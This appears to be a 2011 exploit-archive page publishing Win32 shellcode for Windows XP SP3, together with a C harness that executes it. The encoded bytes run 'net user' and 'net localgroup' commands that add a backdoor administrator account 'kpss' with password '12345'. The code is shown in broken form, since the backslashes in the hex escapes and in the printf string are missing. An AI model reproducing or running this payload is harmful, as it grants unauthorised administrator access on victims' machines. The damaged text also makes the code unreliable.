[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Published : 2011-07-18
# Author :
# Previous Title : Linux x86 egghunt shellcode
# Next Title : linux/x86-64 execve(/bin/sh) 52 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"xebx1bx5bx31xc0x50x31xc0x88x43x4ex53xbbx0dx25x86x7c"
"xffxd3x31xc0x50xbbx12xcbx81x7cxffxd3xe8xe0xffxffxff"
"x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73"
"x65x72x20x6bx70x73x73x20x31x32x33x34x35x20x2fx61x64"
"x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f"
"x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"
"x20x2fx61x64x64x20x6bx70x73x73";
printf("Size = %d bytesn", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}